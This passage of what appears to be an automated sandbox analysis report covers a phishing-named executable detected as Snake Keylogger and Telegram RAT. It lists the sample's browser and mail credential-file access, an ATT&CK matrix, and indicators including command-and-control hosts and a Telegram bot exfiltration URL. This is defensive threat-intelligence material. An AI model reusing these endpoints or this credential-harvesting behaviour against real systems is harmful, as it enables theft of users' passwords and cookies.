                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\new order 00041221.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		111
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Query Registry                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Security Software Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin Shares1
                    Data from Local System                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS31
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture3
                    Ingress Tool Transfer                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input Capture14
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                    Software Packing                    		DCSync13
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    new order 00041221.exe41%VirustotalBrowse
                    new order 00041221.exe47%ReversingLabsByteCode-MSIL.Trojan.SnakeStealer
                    new order 00041221.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.moonbrosurgical.com0%VirustotalBrowse
                    reallyfreegeoip.org0%VirustotalBrowse
                    api.telegram.org2%VirustotalBrowse
                    checkip.dyndns.com0%VirustotalBrowse
                    checkip.dyndns.org0%VirustotalBrowse
                    15.164.165.52.in-addr.arpa0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    http://r11.o.lencr.org0#0%Avira URL Cloudsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://www.office.com/lB0%Avira URL Cloudsafe
                    https://api.telegram.org1%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a0%Avira URL Cloudsafe
                    https://www.office.com/0%VirustotalBrowse
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=en00%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                    https://www.office.com/lB0%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    http://varders.kozow.com:80810%Avira URL Cloudsafe
                    http://aborters.duckdns.org:80810%Avira URL Cloudsafe
                    http://51.38.247.67:8081/_send_.php?L0%Avira URL Cloudsafe
                    https://api.telegram.org/bot1%VirustotalBrowse
                    https://chrome.google.com/webstore?hl=en0%VirustotalBrowse
                    http://r11.i.lencr.org/0Q0%Avira URL Cloudsafe
                    http://aborters.duckdns.org:808112%VirustotalBrowse
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%VirustotalBrowse
                    http://51.38.247.67:8081/_send_.php?L3%VirustotalBrowse
                    https://www.office.com/00%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20a1%VirustotalBrowse
                    http://anotherarmy.dns.army:8081100%Avira URL Cloudmalware
                    https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                    http://mail.moonbrosurgical.com0%Avira URL Cloudsafe
                    http://varders.kozow.com:808115%VirustotalBrowse
                    http://r11.i.lencr.org/0Q0%VirustotalBrowse
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%Avira URL Cloudsafe
                    http://anotherarmy.dns.army:808115%VirustotalBrowse
                    http://mail.moonbrosurgical.com0%VirustotalBrowse
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.moonbrosurgical.com
                    		203.124.44.4
                    		truefalseunknown
                    reallyfreegeoip.org
                    		188.114.97.3
                    		truetrueunknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrueunknown
                    checkip.dyndns.com
                    		193.122.6.168
                    		truefalseunknown
                    15.164.165.52.in-addr.arpa
                    		unknown
                    		unknowntrueunknown
                    checkip.dyndns.org
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2027/07/2024%20/%2000:07:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33false
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.office.com/new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/chrome_newtabnew order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.orgnew order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.iconew order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://r11.o.lencr.org0#new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/botnew order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.office.com/lBnew order 00041221.exe, 00000003.00000002.3711414422.00000000030A0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20anew order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://chrome.google.com/webstore?hl=en0new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://checkip.dyndns.orgnew order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://chrome.google.com/webstore?hl=ennew order 00041221.exe, 00000003.00000002.3711414422.0000000003074000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003065000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.00000000030A5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://varders.kozow.com:8081new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 15%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://aborters.duckdns.org:8081new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 12%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://51.38.247.67:8081/_send_.php?Lnew order 00041221.exe, 00000003.00000002.3711414422.00000000030D0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://r11.i.lencr.org/0Qnew order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33$new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F5A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.office.com/0new order 00041221.exe, 00000003.00000002.3711414422.0000000003096000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://anotherarmy.dns.army:8081new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 15%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://x1.c.lencr.org/0new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://x1.i.lencr.org/0new order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3716273829.0000000006678000.00000004.00000020.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnew order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://checkip.dyndns.org/qnew order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://chrome.google.com/webstore?hl=enlBnew order 00041221.exe, 00000003.00000002.3711414422.000000000306F000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://mail.moonbrosurgical.comnew order 00041221.exe, 00000003.00000002.3711414422.00000000030E0000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.orgnew order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F9F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002FC7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenew order 00041221.exe, 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=new order 00041221.exe, 00000003.00000002.3714025958.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3714025958.00000000041EF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodednew order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    149.154.167.220
